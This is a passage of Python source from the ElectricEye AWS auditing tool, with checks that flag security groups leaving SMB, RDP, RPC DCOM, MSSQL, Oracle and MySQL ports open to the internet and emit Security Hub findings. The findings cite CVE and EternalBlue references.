+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Attack signature information, refer to Threatl Intel Source URL",
"Source": "Symantec Security Center",
"SourceUrl": "https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20387",
}
],
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
if toPort and fromPort == "135" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-rpc-dcom-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.4] Security groups should not allow unrestricted Windows RPC DCOM access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Windows RPC DCOM access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Attack signature information, refer to Threatl Intel Source URL",
"Source": "Symantec Security Center",
"SourceUrl": "https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20387",
}
],
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_smb_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.5] Security groups should not allow unrestricted Server Message Blocks (SMB) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "445" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-smb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.5] Security groups should not allow unrestricted Server Message Blocks (SMB) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Server Message Blocks (SMB) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue",
},
{
"Category": "BACKDOOR",
"Value": "How to use EternalBlue to Exploit SMB Port using Public Wi-Fi",
"Source": "Medium",
"SourceUrl": "https://medium.com/@melvinshb/how-to-use-eternalblue-to-exploit-smb-port-using-public-wi-fi-79a996821767",
},
],
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "445" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-smb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.5] Security groups should not allow unrestricted Server Message Blocks (SMB) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Server Message Blocks (SMB) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue",
},
{
"Category": "BACKDOOR",
"Value": "How to use EternalBlue to Exploit SMB Port using Public Wi-Fi",
"Source": "Medium",
"SourceUrl": "https://medium.com/@melvinshb/how-to-use-eternalblue-to-exploit-smb-port-using-public-wi-fi-79a996821767",
},
],
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_mssql_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.6] Security groups should not allow unrestricted Microsoft SQL Server (MSSQL) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "1433" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-mssql-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.6] Security groups should not allow unrestricted Microsoft SQL Server (MSSQL) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Microsoft SQL Server (MSSQL) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2020-0618: Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0618",
},
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2019-0819: Microsoft SQL Server Analysis Services Information Disclosure Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2019-0819",
},
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2018-8273: Microsoft SQL Server Remote Code Execution Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2018-8273",
},
],
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "1433" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-mssql-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.6] Security groups should not allow unrestricted Microsoft SQL Server (MSSQL) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Microsoft SQL Server (MSSQL) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2020-0618: Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0618",
},
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2019-0819: Microsoft SQL Server Analysis Services Information Disclosure Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2019-0819",
},
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2018-8273: Microsoft SQL Server Remote Code Execution Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2018-8273",
},
],
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_oracle_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.7] Security groups should not allow unrestricted Oracle database (TCP 1521) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "1521" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-oracledb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.7] Security groups should not allow unrestricted Oracle database (TCP 1521) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Oracle database (TCP 1521) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "1521" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-oracledb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.7] Security groups should not allow unrestricted Oracle database (TCP 1521) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Oracle database (TCP 1521) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_mysql_mariadb_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.8] Security groups should not allow unrestricted MySQL or MariaDB database (TCP 3306) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "3306" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn
+ "/"
+ ipProtocol
+ "/security-group-mysql-mariadb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.8] Security groups should not allow unrestricted MySQL or MariaDB database (TCP 3306) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted MySQL or MariaDB database (TCP 3306) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
if toPort and fromPort == "3306" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn
+ "/"
+ ipProtocol
+ "/security-group-mysql-mariadb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.8] Security groups should not allow unrestricted MySQL or MariaDB database (TCP 3306) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted MySQL or MariaDB database (TCP 3306) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_rdp_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.9] Security groups should not allow unrestricted Remote Desktop Protocol (RDP) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "3389" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-rdp-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "CRITICAL"},
"Confidence": 99,
"Title": "[SecurityGroup.9] Security groups should not allow unrestricted Remote Desktop Protocol (RDP) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Remote Desktop Protocol (RDP) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2020-0660: Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0660",
},
{
"Category": "BACKDOOR",
"Value": "Microsoft CVE-2020-0610: Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0610",
},
],
"Resources": [
{
